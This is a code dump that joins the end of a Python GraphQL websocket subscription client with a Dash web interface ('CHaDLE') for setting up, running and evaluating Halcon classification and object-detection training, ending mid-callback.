self._subscriber_callbacks[op_id] = callback_fn
def _remove_subscriber(self, op_id: str) -> None:
del self._subscriber_callbacks[op_id]
def _create_operation_queue(self, op_id: str) -> None:
self._subscriber_queues[op_id] = queue.Queue()
def _remove_operation_queue(self, op_id: str) -> None:
if op_id in self._subscriber_queues:
del self._subscriber_queues[op_id]
def _get_operation_result(self, op_id: str) -> Dict[str, Any]:
return self._subscriber_queues[op_id].get()
def _connection_init(self, headers: Optional[Dict[str, Any]] = None) -> None:
# if we have already initialized and the passed headers are same as
# prev headers, then do nothing and return
if self._connection_init_done and headers == self._headers:
return
self._headers = headers
# send the `connection_init` message with the payload
payload = {"type": GQL_CONNECTION_INIT, "payload": {"headers": headers}}
self._connection.send(json.dumps(payload))
res = self._queue.get()
if res["type"] == GQL_CONNECTION_ERROR:
err = res.get("payload", "unknown error")
raise ConnectionException(err)
if res["type"] == GQL_CONNECTION_ACK:
self._connection_init_done = True
return
err_msg = (
"Unknown message from server, this client did not understand. "
+ "Original message: "
+ res["type"]
)
raise ConnectionException(err_msg)
def _start(
self, payload: Dict[str, Any], callback: Optional[CallbackType] = None
) -> str:
"""pass a callback function only if this is a subscription"""
op_id = uuid.uuid4().hex
frame = {"id": op_id, "type": GQL_START, "payload": payload}
self._create_operation_queue(op_id)
if callback:
self._insert_subscriber(op_id, callback)
self._connection.send(json.dumps(frame))
return op_id
def _stop(self, op_id: str) -> None:
payload = {"id": op_id, "type": GQL_STOP}
self._connection.send(json.dumps(payload))
def query(
self,
query: str,
variables: Optional[Dict[str, Any]] = None,
headers: Optional[Dict[str, Any]] = None,
) -> Dict[str, Any]:
"""
Run a GraphQL query or mutation. The `query` argument is a GraphQL query
string. You can pass optional variables and headers.
PS: To run a subscription, see the `subscribe` method.
"""
self._connection_init(headers)
payload = {"headers": headers, "query": query, "variables": variables}
op_id = self._start(payload)
res = self._get_operation_result(op_id)
self._stop(op_id)
ack = self._get_operation_result(op_id)
if ack["type"] != GQL_COMPLETE:
logging.warning(f"Expected to receive complete, but received: {ack}")
self._remove_operation_queue(op_id)
return res
def subscribe(
self,
query: str,
variables: Optional[Dict[str, Any]] = None,
headers: Optional[Dict[str, Any]] = None,
callback: Optional[CallbackType] = None,
) -> str:
"""
Run a GraphQL subscription.
Parameters:
query (str): the GraphQL query string
callback (function): a callback function. This is mandatory.
This callback function is called, everytime there is new data from the
subscription.
variables (dict): (optional) GraphQL variables
headers (dict): (optional) a dictionary of headers for the session
Returns:
op_id (str): The operation id (a UUIDv4) for this subscription operation
"""
# sanity check that the user passed a valid function
if not callback and not callable(callback):
raise TypeError(
"the argument `callback` is mandatory and it should be a function"
)
self._connection_init(headers)
payload = {"headers": headers, "query": query, "variables": variables}
op_id = self._start(payload, callback)
return op_id
def stop_subscribe(self, op_id: str) -> None:
"""
Stop a subscription. Takes an operation ID (`op_id`) and stops the
subscription.
"""
self._stop(op_id)
self._remove_subscriber(op_id)
self._remove_operation_queue(op_id)
def close(self) -> None:
"""
Close the connection with the server. To reconnect, use the `connect`
method.
"""
self._shutdown_receiver = True
self._connection.close()
self._recevier_thread.join()
def __enter__(self) -> "SubscriptionClient":
"""enter method for context manager"""
return self
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_value: Optional[BaseException],
exc_traceback: Optional[TracebackType],
) -> None:
"""exit method for context manager"""
self.close()
|
app_New.py
|
import base64
import datetime
import plotly
import plotly.figure_factory as ff
import os
import dash
import dash_bootstrap_components as dbc
import dash_daq as daq
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
import json
import run_CL_new as run
import run_OD as run_OD
iterationList = []
lossList = []
epochOfLossList = []
epochOfTop1ErrorList = []
epochOfMeanAPList = []
TrainSet_top1_error_valueList = []
ValidationSet_top1_error_valueList = []
TrainSet_mean_ap_valueList = []
ValidationSet_mean_ap_valueList = []
metricList = []
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
image_filename = 'C:/Users/930415/PycharmProjects/chadle/dashUI/icon.png' # replace with your own image
encoded_image = base64.b64encode(open(image_filename, 'rb').read())
CLProjectNames = ','.join(run.CLProjectList)
ODProjectNames = ','.join(run.ODProjectList)
app.layout = html.Div([
html.Center(html.Img(src='data:image/png;base64,{}'.format(encoded_image.decode()), width='80', height='70')),
# Title
html.H1('CHaDLE ',
style={
"font": 'verdana',
'textAlign': 'center',
'color': 'Black'
}
),
# Tabs for CL and OD
html.Div([
dcc.Tabs(id='AllTab', value='AllTab', children=[
# Classification Tab
dcc.Tab(
label='Classification',
value='CLTab',
children=
[
html.Div([
html.Div(
[
# Main control panel - project name, device, pretrained model, buttons.
html.Div(
[
html.Th(children='Available Classification Projects: ' + CLProjectNames,
colSpan="1"),
html.Br(),
"Project Name:",
dcc.Input(
id='ProjectName_CL', value='Animals', type='text'
),
html.Br(),
"Training Device:", dcc.RadioItems(
id='Runtime_CL',
options=[{'label': i, 'value': i} for i in ['cpu', 'gpu']],
value='cpu',
labelStyle={'display': 'inline-block'}
),
"Pretrained Model:", dcc.Dropdown(
id='PretrainedModel_CL',
options=[{'label': i, 'value': i} for i in
["classifier_enhanced", "classifier_compact"]],
value='classifier_compact'
),
html.Div([html.Br()]),
html.Div([html.Br()]),
html.Button(id='operation_button_CL', n_clicks=0, children='Start Training'),
html.Div([html.Br()]),
html.Div([html.Br()]),
html.Div([html.Br()]),
dcc.Loading(
id="loading-1",
type="default",
children=[html.Div(id="Training_loading_CL"),
html.Div(id="Evaluation_loading_CL")]
),
],
style={'width': '35%', 'float': 'left', 'display': 'inline-block'}
),
# Augmentation parameters panel
html.Div(
[
# Percentage of augmentation. Mandatory. 0% means not activated
html.Div(
[
# html.Label('Augmentation Percentage: '),
html.Label(id='AugmentationPercentage_CL',
style={'color': 'black',
'padding': '6px',
'font-family': 'Arial'
}
)
],
style={'display': 'inline'}
),
html.Div(
dcc.Slider(
id='AugmentationPercentage_CL_slider',
min=0,
max=100,
value=0,
marks={
0: {'label': '0%', },
25: {'label': '25%'},
50: {'label': '50%', 'style': {'color': '#77b0b1'}},
75: {'label': '75%'},
100: {'label': '100%'}
},
),
style={'width': '100%', 'float': 'left'},
),
# html.Label('Augmentation Percentage'),
# dcc.Input(id='AugmentationPercentage_CL', value='100', type='number', min=0, max=100, step=1, ),
html.Div([html.Br()]),
html.Div([html.Br()]),
# Rotation & Rotation Range checkbox and input.
# If not activated, placeholder will show 'disabled', same as following parameters.
dcc.Checklist(
id='Rotation_CL_Switch',
options=[
{
'label': 'Activate Rotation', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Label('Rotation(Step of 90 degree)'),
dcc.Input(
id='Rotation_CL',
value='',
type='number',
min=-180, max=180,
step=90,
disabled=True,
placeholder="Disabled"
),
html.Label('Rotation Range(Step of 1)'),
dcc.Input(
id='RotationRange_CL',
value='',
type='number',
min=0,
step=1,
disabled=True,
placeholder="Disabled"
),
html.Div([html.Br()]),
# Mirror checkbox and input
dcc.Checklist(
id='mirror_CL_Switch',
options=[
{
'label': 'Activate Mirror', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Label('Mirror (off,c,r,rc)'),
dcc.Input(
id='mirror_CL',
value='',
type='text',
disabled=True,
placeholder="Disabled"
),
html.Div([html.Br()]),
# Brightness Variation and Variation Spot checkbox and input
dcc.Checklist(
id='BrightnessVariation_CL_Switch',
options=[
{
'label': 'Activate Brightness Variation', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Label('Brightness Variation'),
dcc.Input(
id='BrightnessVariation_CL',
value='',
type='number',
min=-100,
max=100,
step=1,
disabled=True,
placeholder="Disabled"
),
html.Label('Brightness Variation Spot'),
dcc.Input(
id='BrightnessVariationSpot_CL',
value='',
type='number',
min=0,
step=1,
disabled=True,
placeholder="Disabled"
),
html.Div([html.Br()]),
# Crop Percentage and Crop Pixel checkbox and input
dcc.Checklist(
id='Crop_CL_Switch',
options=[
{
'label': 'Activate Crop', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Label('Crop Percentage'),
dcc.Input(
id='CropPercentage_CL',
value='',
type='number',
min=0,
max=100,
step=1,
disabled=True,
placeholder="Disabled"
),
html.Label('Crop Pixel'),
dcc.Input(
id='CropPixel_CL',
value='',
type='number',
min=0,
step=1,
disabled=True,
placeholder="Disabled"
),
html.Div([html.Br()]),
# Ignore Direction checkbox and input
dcc.Checklist(
id='Direction_CL_Switch',
options=[
{
'label': 'Ignore Direction', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Div([html.Br()]),
dcc.Checklist(
id='ClassID_CL_Switch',
options=[
{
'label': 'Class IDs No Orientation Exist', 'value': 0
}
],
value=[],
style={'color': '#C04000'}
),
html.Label('Class IDs No Orientation'),
dcc.Input(
id='ClassIDsNoOrientation',
value='',
type='text',
disabled=True,
placeholder="Disabled"
),
# html.Label('Class IDs No Orientation'),
# dcc.Input(id='ClassIDsNoOrientation', value='[]', type='text'),
],
style={'width': '35%', 'display': 'inline-block'}
),
# Image and training detail parameters panel
html.Div(
[
html.Label('Image Width'),
dcc.Input(id='ImWidth_CL', value='100 ', type='number', min=0, step=1, ),
html.Label('Image Height'),
dcc.Input(id='ImHeight_CL', value='100', type='number', min=0, step=1, ),
html.Label('Image Channel'),
dcc.Input(id='ImChannel_CL', value='3', type='number', min=0, step=1, ),
html.Label('Batch Size'),
dcc.Input(id='BatchSize_CL', value='1', type='number', min=0, step=1, ),
html.Label('Initial Learning Rate'),
dcc.Input(id='InitialLearningRate_CL', value='0.001', type='number', min=0,
step=0.00001, ),
html.Label('Momentum'),
dcc.Input(id='Momentum_CL', value='0.09', type='number', min=0, step=0.00001, ),
html.Label('Number of Epochs'),
dcc.Input(id='NumEpochs_CL', value='2', type='number', min=0, step=1, ),
html.Label('Change Learning Rate @ Epochs'),
dcc.Input(id='ChangeLearningRateEpochs_CL', value='50,100', type='text'),
html.Label('Learning Rate Schedule'),
dcc.Input(id='lr_change_CL', value='0.01,0.05', type='text'),
html.Label('Regularisation Constant'),
dcc.Input(id='WeightPrior_CL', value='0.001', type='number', min=0,
step=0.00001, ),
html.Label('Class Penalty'),
dcc.Input(id='class_penalty_CL', value='0,0', type='text'),
],
style={'width': '30%', 'display': 'inline-block'}
),
html.Div([html.Br()]),
html.Div([html.Br()]),
],
style={'width': '45%', 'display': 'inline-block', 'float': 'left'}
),
# Graph Plotter
html.Div(
[
html.H4('Training Monitor',
style={
"font": 'Helvetica',
'textAlign': 'center',
'color': 'Black'
}),
html.Div(id='metrics_CL',
style={
"font": 'Helvetica',
'textAlign': 'center',
'color': 'Blue'
}),
dcc.Graph(id='iteration_loss_graph_CL'),
dcc.Graph(id='top1_error_graph_CL'),
dcc.Interval(
id='interval_graph_CL',
interval=1 * 1000, # in milliseconds
n_intervals=0
)
],
style={'width': '55%', 'float': 'right'}
),
]),
html.Div([html.Br()]),
html.Div([html.Br()]),
html.Div([html.Br()]),
html.Div([html.Br()]),
# Evaluation
html.Div([
html.Div(
[
html.H4('Evaluation Graph', style={'float': 'center'}),
html.Button(id='evaluation_button_CL', n_clicks=0, children='Evaluation'),
],
style={'width': '75%', 'float': 'right'}
),
html.Div([html.Br()]),
html.Div([html.Br()]),
html.Div(
[
html.Div(id='evaluation_text_CL'),
dcc.Graph(id='evaluation_graph_CL'),
],
style={'width': '60%', 'float': 'left', }
),
dcc.Interval(
id='interval-evaluation_CL',
interval=1 * 1000, # in milliseconds
n_intervals=0
)
]),
html.Div(id='Operation_output_CL'),
html.Div(id='makeJson_CL'),
],
style={'display': 'inline-block'}
),
# Object Detection Tab
dcc.Tab(label='Object Detection', value='ODTab', children=[
# Basic inputs
html.Div([html.Th(children='Available Object Detection Projects: ' + ODProjectNames, colSpan="1"),
html.Br(),
"Project Name:",
dcc.Input(
id='ProjectName_OD', value='NTBW', type='text'
),
html.Br(),
"Training Device:", dcc.RadioItems(
id='Runtime_OD',
options=[{'label': i, 'value': i} for i in ['cpu', 'gpu']],
value='cpu',
labelStyle={'display': 'inline-block'}
),
"Pretrained Model:", dcc.Dropdown(
id='PretrainedModel_OD',
options=[{'label': i, 'value': i} for i in ["classifier_enhanced", "classifier_compact"]],
value='classifier_compact'
),
], style={'width': '15%', 'display': 'inline-block'}),
html.Br(),
html.Br(),
# Parameters inputs
html.Div([
html.Div([
html.Label('Number of Classes'),
dcc.Input(id='NumClasses_OD', value='5', type='number', min=0, step=1, ),
html.Label('Image Width'),
dcc.Input(id='ImWidth_OD', value='960', type='number', min=0, step=1, ),
html.Label('Image Height'),
dcc.Input(id='ImHeight_OD', value='1024', type='number', min=0, step=1, ),
html.Label('Image Channel'),
dcc.Input(id='ImChannel_OD', value='3', type='number', min=0, step=1, ),
html.Label('Capacity'),
dcc.Input(id='Capacity_OD', value='medium', type='text', min=0, step=1, ),
html.Label('Instance Type'),
dcc.Input(id='InstanceType_OD', value='rectangle1', type='text', min=0, step=1, ),
html.Label('Training Percent'),
dcc.Input(id='TrainingPercent_OD', value='75', type='number', min=0, step=1, ),
html.Label('Validation Percent'),
dcc.Input(id='ValidationPercent_OD', value='15', type='number', min=0, step=1, ),
],
style={'width': '15%', 'display': 'inline-block'}),
html.Div([
html.Label('Batch Size'),
dcc.Input(id='BatchSize_OD', value='10', type='number', min=0, step=1, ),
html.Label('Initial Learning Rate'),
dcc.Input(id='InitialLearningRate_OD', value='0.001', type='number', min=0, step=0.00001, ),
html.Label('Momentum'),
dcc.Input(id='Momentum_OD', value='0.09', type='number', min=0, step=0.00001, ),
html.Label('Number of Epochs'),
dcc.Input(id='NumEpochs_OD', value='2', type='number', min=0, step=1, ),
html.Label('Change Learning Rate @ Epochs'),
dcc.Input(id='ChangeLearningRateEpochs_OD', value='50,100', type='text'),
html.Label('Learning Rate Schedule'),
dcc.Input(id='lr_change_OD', value='0.01,0.05', type='text'),
html.Label('Regularisation Constant'),
dcc.Input(id='WeightPrior_OD', value='0.001', type='number', min=0, step=0.00001, ),
html.Label('Class Penalty'),
dcc.Input(id='class_penalty_OD', value='0,0', type='text'),
],
style={'width': '15%', 'display': 'inline-block'}),
html.Div([
html.Label('Augmentation Percentage'),
dcc.Input(id='AugmentationPercentage_OD', value='100', type='number', min=0, max=100, step=1, ),
html.Label('Rotation'),
dcc.Input(id='Rotation_OD', value='90', type='number', min=-180, max=180, step=90, ),
html.Label('Mirror (off,c,r,rc)'),
dcc.Input(id='mirror_OD', value='off', type='text', ),
html.Label('Brightness Variation'),
dcc.Input(id='BrightnessVariation_OD', value='0', type='number', min=-100, max=100, step=1, ),
html.Label('Brightness Variation Spot'),
dcc.Input(id='BrightnessVariationSpot_OD', value='0', type='number', min=-100, max=100,
step=1, ),
html.Label('Rotation Range (Step of 1)'),
dcc.Input(id='RotationRange_OD', value='10', type='number', min=1, step=1, ),
html.Label('Bbox heads weight'),
dcc.Input(id='BboxHeads_OD', value='', type='number', min=1, step=1, ),
html.Label('Class heads weight'),
dcc.Input(id='ClassHeads_OD', value='', type='number', min=1, step=1, ),
# html.Label('Ignore Direction'),
# dcc.Input(id='IgnoreDirection', value='false', type='text'),
# html.Label('Class IDs No Orientation Exist'),
# dcc.Input(id='ClassIDsNoOrientationExist', value='false', type='text'),
# html.Label('Class IDs No Orientation'),
# dcc.Input(id='ClassIDsNoOrientation', value='[]', type='text'),
],
style={'width': '15%', 'float': 'initial', 'display': 'inline-block',
}),
# Estimated Value show and input
html.Div([
html.H4('Halcon estimated values'),
html.P('Key in new desired value or leave it empty: '),
html.Br(),
html.Div([html.P('Min Level: '),
html.Div([html.Div(id='MinLevel_OD'), ],
style={"font": 'Helvetica', 'color': 'Blue'}),
dcc.Input(id='MinLevel_Input_OD', placeholder='Integer', type='number', min=0,
step=1,
debounce=True), ]),
html.Br(),
html.Div([html.P('Max Level: '),
html.Div([html.Div(id='MaxLevel_OD'), ],
style={"font": 'Helvetica', 'color': 'Blue'}),
dcc.Input(id='MaxLevel_Input_OD', placeholder='Integer', type='number', min=0,
step=1,
debounce=True), ]),
html.Br(),
html.Div([html.P('Anchor Number of Subscales: '),
html.Div([html.Div(id='AnchorNumSubscales_OD'), ],
style={"font": 'Helvetica', 'color': 'Blue'}),
dcc.Input(id='AnchorNumSubscales_Input_OD', placeholder='Integer', type='number',
min=0,
step=1,
debounce=True), ]),
html.Br(),
html.Div([html.P('Anchor Aspect Ratios (min,max,mean,deviation): '),
html.Div([html.Div(id='AnchorAspectRatios_OD'), ],
style={"font": 'Helvetica', 'color': 'Blue'}),
dcc.Input(id='AnchorAspectRatios_Input_OD',
placeholder='List (0.720, 1.475, 2.125, 2.753)',
type='text', min=0, debounce=True, style={'width': '50%', }), ]),
# if user wanna change, type in the desired value.
# value = Best value among 4 read by halcon
# label the value,
],
style={'width': '40%', 'float': 'right'},
),
]),
html.Br(),
html.Br(),
html.Br(),
dcc.Loading(
id="loading_OD",
type="default",
children=[html.Div(id="Training_loading_OD"),
html.Div(id="Estimate_values_loading_OD")]
),
html.Br(),
# Buttons
html.Div([
html.Button(id='estimate_button_OD', n_clicks=0, children='Halcon Estimate Values'),
html.Button(id='operation_button_OD', n_clicks=0, children='Train'),
# html.Button(id='parameters_out_button', n_clicks=0, children='Output Parameters'),
html.Button(id='evaluation_button_OD', n_clicks=0, children='Evaluation'), ],
style={'display': 'flex',
'justify-content': 'center',
'align-items': 'center',
'height': '100px',
}, ),
html.Div([html.Label(id='training_output_OD'), ], style={'display': 'flex',
'justify-content': 'center',
'align-items': 'center',
'height': '50px',
}, ),
# Evaluation Graph
html.Div([
html.Div([html.H2('Evaluation Graph Coming Soon...',
style={
"font": 'Helvetica',
'textAlign': 'center',
'color': 'Black'
}),
html.Div(id='evaluation_text_OD'),
dcc.Graph(id='evaluation_graph_OD'),
],
style={'width': '100%', 'float': 'initial'}),
dcc.Interval(
id='interval-evaluation_OD',
interval=1 * 1000, # in milliseconds
n_intervals=0
)
], ),
# OD training monitor graph plotter
html.Div([
html.H1('CHaDLE Training Monitor - Object Detection',
style={
"font": 'Helvetica',
'textAlign': 'center',
'color': 'Black'
}),
html.Div(id='metrics_OD',
style={
"font": 'Helvetica',
'textAlign': 'center',
'color': 'Blue'
}),
dcc.Graph(id='iteration_loss_graph_OD'),
dcc.Graph(id='mean_ap_graph_OD'),
dcc.Interval(
id='interval_graph_OD',
interval=1 * 1000, # in milliseconds
n_intervals=0
)
])
]),
]),
]),
])
############################################################################################################
############################################## Call Backs ##################################################
############################################################################################################
############################################ Classification ##################################
@app.callback(
Output('AugmentationPercentage_CL', 'children'),
Input('AugmentationPercentage_CL_slider', 'value'),
)
def update_output(value):
return 'Augmentation Percentage: {}%'.format(value)
@app.callback(
Output("Rotation_CL", "disabled"),
Output("Rotation_CL", "placeholder"),
Output("RotationRange_CL", "disabled"),
Output("RotationRange_CL", "placeholder"),
Input("Rotation_CL_Switch", "value"),
State("Rotation_CL", "disabled"),
State("Rotation_CL", "placeholder"),
State("RotationRange_CL", "disabled"),
State("RotationRange_CL", "placeholder")
)
def Rotation_CL_switch(Rotation_CL_Switch, Rotation_CL_disabled, Rotation_CL_placeholder, RotationRange_CL_disabled,
RotationRange_CL_placeholder):
if not Rotation_CL_Switch:
Rotation_CL_disabled = True
RotationRange_CL_disabled = True
Rotation_CL_placeholder = 'Disabled'
RotationRange_CL_placeholder = 'Disabled'
elif Rotation_CL_Switch == [0]:
Rotation_CL_disabled = False
RotationRange_CL_disabled = False
Rotation_CL_placeholder = ''
RotationRange_CL_placeholder = ''
return Rotation_CL_disabled, Rotation_CL_placeholder, RotationRange_CL_disabled, RotationRange_CL_placeholder
@app.callback(
Output("mirror_CL", "disabled"),
Output("mirror_CL", "placeholder"),
Input("mirror_CL_Switch", "value"),
State("mirror_CL", "disabled"),
State("mirror_CL", "placeholder")
)
def mirror_CL_switch(mirror_CL_Switch, disabled, placeholder):
if not mirror_CL_Switch:
disabled = True
placeholder = 'Disabled'
elif mirror_CL_Switch == [0]:
disabled = False
placeholder = ''
return disabled, placeholder
@app.callback(
Output("BrightnessVariation_CL", "disabled"),
Output("BrightnessVariation_CL", "placeholder"),
Output("BrightnessVariationSpot_CL", "disabled"),
Output("BrightnessVariationSpot_CL", "placeholder"),
Input("BrightnessVariation_CL_Switch", "value"),
State("BrightnessVariation_CL", "disabled"),
State("BrightnessVariation_CL", "placeholder"),
State("BrightnessVariationSpot_CL", "disabled"),
State("BrightnessVariationSpot_CL", "placeholder")
)
def Brightness_Variation_CL_switch(BrightnessVariation_CL_Switch, BrightnessVariation_CL_disabled,
BrightnessVariation_CL_placeholder, BrightnessVariationSpot_CL_disabled,
BrightnessVariationSpot_CL_placeholder):
if not BrightnessVariation_CL_Switch:
BrightnessVariation_CL_disabled = True
BrightnessVariationSpot_CL_disabled = True
BrightnessVariation_CL_placeholder = 'Disabled'
BrightnessVariationSpot_CL_placeholder = 'Disabled'
elif BrightnessVariation_CL_Switch == [0]:
BrightnessVariation_CL_disabled = False
BrightnessVariationSpot_CL_disabled = False
BrightnessVariation_CL_placeholder = ''
BrightnessVariationSpot_CL_placeholder = ''
return BrightnessVariation_CL_disabled, BrightnessVariation_CL_placeholder, BrightnessVariationSpot_CL_disabled, BrightnessVariationSpot_CL_placeholder
@app.callback(
Output("CropPercentage_CL", "disabled"),
Output("CropPercentage_CL", "placeholder"),
Output("CropPixel_CL", "disabled"),
Output("CropPixel_CL", "placeholder"),
Input("Crop_CL_Switch", "value"),
State("CropPercentage_CL", "disabled"),
State("CropPercentage_CL", "placeholder"),
State("CropPixel_CL", "disabled"),
State("CropPixel_CL", "placeholder")
)
def Crop_CL_switch(Crop_CL_Switch, CropPercentage_CL_disabled, CropPercentage_CL_placeholder, CropPixel_CL_disabled,
CropPixel_CL_placeholder):
if not Crop_CL_Switch:
CropPercentage_CL_disabled = True
CropPixel_CL_disabled = True
CropPercentage_CL_placeholder = 'Disabled'
CropPixel_CL_placeholder = 'Disabled'
elif Crop_CL_Switch == [0]:
CropPercentage_CL_disabled = False
CropPixel_CL_disabled = False
CropPercentage_CL_placeholder = ''
CropPixel_CL_placeholder = ''
return CropPercentage_CL_disabled, CropPercentage_CL_placeholder, CropPixel_CL_disabled, CropPixel_CL_placeholder
@app.callback(
Output("ClassIDsNoOrientation", "disabled"),
Output("ClassIDsNoOrientation", "placeholder"),
Input("ClassID_CL_Switch", "value"),
State("ClassIDsNoOrientation", "disabled"),
State("ClassIDsNoOrientation", "placeholder")
)
def ClassIDs_CL_switch(ClassID_CL_Switch, disabled, placeholder):
if not ClassID_CL_Switch:
disabled = True
placeholder = 'Disabled'
elif ClassID_CL_Switch == [0]:
disabled = False
placeholder = ''
return disabled, placeholder
@app.callback(Output('Operation_output_CL', 'children'),
Output("Training_loading_CL", "children"),
Input('operation_button_CL', 'n_clicks'),
State('Rotation_CL_Switch', 'value'),
State('mirror_CL_Switch', 'value'),
State('BrightnessVariation_CL_Switch', 'value'),
State('Crop_CL_Switch', 'value'),
State('Direction_CL_Switch', 'value'),
State('ProjectName_CL', 'value'),
State('Runtime_CL', 'value'),
State('PretrainedModel_CL', 'value'),
State('ImWidth_CL', 'value'),
State('ImHeight_CL', 'value'),
State('ImChannel_CL', 'value'),
State('BatchSize_CL', 'value'),
State('InitialLearningRate_CL', 'value'),
State('Momentum_CL', 'value'),
State('NumEpochs_CL', 'value'),
State('ChangeLearningRateEpochs_CL', 'value'),
State('lr_change_CL', 'value'),
State('WeightPrior_CL', 'value'),
State('class_penalty_CL', 'value'), # AugmentationPercentage_CL_slider
State('AugmentationPercentage_CL_slider', 'value'),
State('Rotation_CL', 'value'),
State('mirror_CL', 'value'),
State('BrightnessVariation_CL', 'value'),
State('BrightnessVariationSpot_CL', 'value'),
State('RotationRange_CL', 'value'),
State('CropPercentage_CL', 'value'),
State('CropPixel_CL', 'value'),
)
def operation_CL(operation_button_CL, Rotation_CL_Switch, mirror_CL_Switch, BrightnessVariation_CL_Switch,
Crop_CL_Switch, Direction_CL_Switch, ProjectName_CL, Runtime_CL, PretrainedModel_CL, ImWidth_CL,
ImHeight_CL, ImChannel_CL, BatchSize_CL, InitialLearningRate_CL, Momentum_CL, NumEpochs_CL,
ChangeLearningRateEpochs_CL, lr_change_CL, WeightPrior_CL,
class_penalty_CL, AugmentationPercentage_CL, Rotation_CL, mirror_CL, BrightnessVariation_CL,
BrightnessVariationSpot_CL, RotationRange_CL, CropPercentage_CL, CropPixel_CL):
ctx_operation_CL = dash.callback_context
if not ctx_operation_CL.triggered:
button_id = 'Null'
else:
button_id = ctx_operation_CL.triggered[0]['prop_id'].split('.')[0]
print(button_id)
if button_id == 'Null':
raise PreventUpdate
else:
if button_id == 'operation_button_CL':
var = list((x for x in list(map(str.upper, run.CLProjectList)) if ProjectName_CL.upper() in x))
ProjectDir_CL = run.Chadle_DataDir + '/Classification/' + var[0]
ParameterDict = {'ProjectName': ProjectName_CL,
'Runtime': Runtime_CL, 'PretrainedModel': PretrainedModel_CL, 'ImWidth': ImWidth_CL,
'ImHeight': ImHeight_CL,
'ImChannel': ImChannel_CL,
'BatchSize': BatchSize_CL, 'InitialLearningRate': InitialLearningRate_CL,
'Momentum': Momentum_CL,
'NumEpochs': NumEpochs_CL,
'ChangeLearningRateEpochs': ChangeLearningRateEpochs_CL, 'lr_change': lr_change_CL,
'WeightPrior': WeightPrior_CL,
'class_penalty': class_penalty_CL, 'AugmentationPercentage': AugmentationPercentage_CL,
'Rotation': Rotation_CL, 'mirror': mirror_CL,
'BrightnessVariation': BrightnessVariation_CL,
'BrightnessVariationSpot': BrightnessVariationSpot_CL,
'RotationRange': RotationRange_CL, }
if os.path.exists(ProjectDir_CL + '/status.txt'):
os.remove(ProjectDir_CL + '/status.txt')
with open(ProjectDir_CL + '/hyper_parameters.txt', 'w') as outfile:
json.dump(ParameterDict, outfile)
pre_process_param = run.pre_process_CL(Rotation_CL_Switch, mirror_CL_Switch,
BrightnessVariation_CL_Switch,
Crop_CL_Switch, Direction_CL_Switch, ProjectName_CL, Runtime_CL,
PretrainedModel_CL,
ImWidth_CL,
ImHeight_CL,
ImChannel_CL,
BatchSize_CL, InitialLearningRate_CL, Momentum_CL, NumEpochs_CL,
ChangeLearningRateEpochs_CL, lr_change_CL, WeightPrior_CL,
class_penalty_CL, AugmentationPercentage_CL, Rotation_CL, mirror_CL,
BrightnessVariation_CL, BrightnessVariationSpot_CL,
RotationRange_CL, CropPercentage_CL, CropPixel_CL)
DLModelHandle = pre_process_param[0][0]
DLDataset = pre_process_param[1][0]
TrainParam = pre_process_param[2][0]
run.training_CL(DLModelHandle, DLDataset, TrainParam)
metricList.append(DLModelHandle)
metricList.append(DLDataset)
metricList.append(TrainParam)
# run.training(templist[-3], templist[-2], templist[-1])
# run.training(templist[0], templist[1], templist[2])
else:
i = 1
# run.training(templist[-3], templist[-2], templist[-1])
return '', ''
@app.callback(Output('evaluation_graph_CL', 'figure'),
Output('Evaluation_loading_CL', 'children'),
Input('evaluation_button_CL', 'n_clicks'),
State('ProjectName_CL', 'value'),
State('ImWidth_CL', 'value'),
State('ImHeight_CL', 'value'),
# State('RotationRange', 'value'),
# State('IgnoreDirection', 'value'),
)
def evaluation_CL(evaluation_button_CL, ProjectName_CL, ImWidth_CL, ImHeight_CL):
z = [[0, 0], [0, 0]]
x = ['Confusion Matrix', 'Confusion Matrix']
y = ['Confusion Matrix', 'Confusion Matrix']
# change each element of z to type string for annotations
z_text = [[str(y) for y in x] for x in z]
fig = ff.create_annotated_heatmap([[0, 0], [0, 0]], x=x, y=y, annotation_text=z_text, colorscale='Blues')
ctx_evaluation_CL = dash.callback_context
if not ctx_evaluation_CL.triggered:
button_id = 'Null'
else:
button_id = ctx_evaluation_CL.triggered[0]['prop_id'].split('.')[0]
if button_id == 'evaluation_button_CL':
print('Evaluation Started')
evaluationList = run.evaluation_CL(ProjectName_CL, ImWidth_CL, ImHeight_CL)
z.clear()
x.clear()
y.clear()
z_text.clear()
confusion_matrix_List = evaluationList[0]
mean_precision = evaluationList[1][0]
mean_recall = evaluationList[2][0]
mean_f_score = evaluationList[3][0]
mean_precision = format(mean_precision, '.3f')
mean_recall = format(mean_recall, '.3f')
mean_f_score = format(mean_f_score, '.3f')
categories = run.getImageCategories(ProjectName_CL, 'Classification')[0]
labels = run.getImageCategories(ProjectName_CL, 'Classification')[1]
# threading.Thread(target=evaluation).start()
length = len(categories)
sublist = [confusion_matrix_List[i:i + length] for i in range(0, len(confusion_matrix_List), length)]
for i in sublist:
z.append(i)
for i in categories:
x.append(i)
y.append(i)
# change each element of z to type string for annotations
# z_text = [[str(y) for y in x] for x in z]
# set up figure
z_text = [[str(y) for y in x] for x in z]
fig = ff.create_annotated_heatmap(z, x=x, y=y, annotation_text=z_text, colorscale='Blues')
# change each element of z to type string for annotations
# add title
fig.update_layout(
title_text='Mean Precision: ' + str(mean_precision) + '\n Mean Recall: ' + str(
mean_recall) + '\n Mean F Score: ' + str(mean_f_score),
)
# add custom xaxis title
fig.add_annotation(dict(font=dict(color="black", size=14),
x=0.5,
y=-0.15,
showarrow=False,
text="Ground Truth",
xref="paper",
yref="paper"))
# add custom yaxis title
fig.add_annotation(dict(font=dict(color="black", size=14),
x=-0.1,
y=0.5,
showarrow=False,
text="Prediction",
textangle=-90,
xref="paper",
yref="paper"))
# adjust margins to make room for yaxis title
fig.update_layout(margin=dict(t=50, l=200))
# add colorbar
fig['data'][0]['showscale'] = True
return fig, ' '
# Historical method to produce json file of input parameters
@app.callback(Output('makeJson_CL', 'children'),
# Input('parameters_out_button', 'n_clicks'),
Input('ProjectName_CL', 'value'),
State('Runtime_CL', 'value'),
